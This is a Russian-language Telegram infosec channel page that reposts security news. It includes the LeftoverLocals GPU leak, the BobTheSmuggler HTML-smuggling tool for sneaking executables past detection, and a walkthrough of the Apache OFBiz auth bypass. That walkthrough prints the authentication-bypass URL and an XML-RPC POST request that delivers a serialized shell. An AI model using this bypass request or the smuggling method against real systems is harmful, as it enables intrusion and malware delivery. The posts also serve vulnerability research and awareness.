Fsecurity | HH
الذهاب إلى القناة على Telegram
Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb
إظهار المزيد2 011
المشتركون
+124 ساعات
لا توجد بيانات7 أيام
-730 أيام
أرشيف المشاركات
2 011
Repost from Cybred
LeftoverLocals
В один день с новыми лабами Web LLM attacks на PortSwigger, Trail of Bits опубликовали отчет о найденной уязвимости, которую они назвали LeftoverLocals.
🔹 уязвимость позволяет читать данные из локальной памяти GPU чужих процессов
🔹 затронуты графические чипы от Apple, Qualcomm и AMD
🔹 на прикрепленной гифке показано, как хакер может прослушивать сессию чужого пользователя в llama.cpp
PoC уже выложили тут https://github.com/trailofbits/LeftoverLocalsRelease
2 011
Repost from AP Security
#пентест #фишинг
BobTheSmuggler - реализуем HTML Smuggling Attack и прячемся от детектирования 👌
Bob the Smuggler - это инструмент, в основе которого лежит реализация HTML Smuggling Attack.
➡️Утилита позволяет создавать HTML-файлы со встроенными 7z/zip-архивами. Инструмент сжимает ваши двоичные файлы (EXE/DLL) в формат 7z/zip, затем архив шифруется с использованием XOR, а затем утилита прячет его внутри файла изображения формата PNG/GIF (Image Polyglots). JavaScript, встроенный в HTML, загрузит PNG/GIF-файл и сохранит его в кэше.
➡️После этого JavaScript извлечет данные, встроенные в PNG/GIF, соберет их, выполнит XOR-дешифрование, а затем сохранит в виде блока в памяти.
2 011
Repost from Monkey Hacker
Oh yes, ping pong
Под конец прошлого года, прошла шумиха с Apache Ofbiz, который позволял сделать байпас аутентификации и проабьюзать
XML-RPC. Решил глянуть, что это было и как оно происходит 😺
Суть заключается в том, что XML-RPC, по логике можно использовать только с валидными кредами, но глянем на сам момент аутентификации юзера в LoginWorker.java
List<String> unpwErrMsgList = new LinkedList<String>();
if (UtilValidate.isEmpty(username)) {
unpwErrMsgList.add(UtilProperties.getMessage(resourceWebapp, "loginevents.username_was_empty_reenter", UtilHttp.getLocale(request)));
}
if (UtilValidate.isEmpty(password) && UtilValidate.isEmpty(token)) {
unpwErrMsgList.add(UtilProperties.getMessage(resourceWebapp, "loginevents.password_was_empty_reenter", UtilHttp.getLocale(request)));
}
boolean requirePasswordChange = "Y".equals(request.getParameter("requirePasswordChange"));
if (!unpwErrMsgList.isEmpty()) {
request.setAttribute("_ERROR_MESSAGE_LIST_", unpwErrMsgList);
return requirePasswordChange ? "requirePasswordChange" : "error";
}
Тут все начинается с requirePasswordChange, который не обращает внимание на то, введет ли юзер валидные креды. Если юзер в качестве параметра отдает Y, то метод login(HttpServletRequest request, HttpServletResponse response) вернет строку requirePasswordChange
Дальше идем в checkLogin() и там уже идет следующий момент
if (username == null
|| (password == null && token == null)
|| "error".equals(login(request, response)))
Т.е по факту, мы тупо можем обойти проверку, путем вставки любого символа ему, и плюс "error".equals(login(request, response)) не будет срабатывать, т.к мы заставили login(...) вернуть requirePasswordChange
Поэтому мы можем дергать ручки XML-RPC
/webtools/control/ping?USERNAME=&PASSWORD=s&requirePasswordChange=Y
А через серелиализацию, мы передаем наш шелл, который можно сделать через ysoserial
POST /webtools/control/xmlrpc/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Length: 4002
Content-Type: application/xml
<?xml version="1.0"?>
<methodCall>
<methodName>Methodname</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>test</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">serialized_shell</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>2 011
Repost from Kali Linux
⭐️ HackBar
Расширение для браузера для тестирования на проникновение.
▪Github
@linuxkalii
2 011
Repost from SecuriXy.kz
Очень удобный скрипт по поиску описания уязвимости и публичных сплоитов к ним...
https://github.com/xaitax/SploitScan?tab=readme-ov-file
#CVE #Sploitscan #Toolkits
2 011
Вы знали, что есть целый сборник разной информации по ИБ на моем Github 🦑
Хочу также посоветовать:
1 - Проверить себя на утечки! 💧
2 - Наш discord сервер! Где можно пообщаться 👾
3 - Новый ТГ канал [Ximera-Chan] который ведёт Ai
2 011
Repost from Pentest HaT
📈 Инфографика по zero day за прошлый год 👌
Автор - https://twitter.com/SwitHak/status/1746649551425900626
#zeroday #cve
✈️ // Pentest HaT 🎩
2 011
Repost from Бэкап
Holehe OSINT - электронная почта для зарегистрированных учетных записей.
holehe позволяет проверить, используется ли почта на различных сайтах, таких как twitter, instagram, и получит информацию о сайтах с функцией забытого пароля.
Языки: Python (100%).
https://github.com/megadose/holehe
⚡️ @becaps
متاح الآن! بحث تيليغرام 2025 — أهم رؤى العام 
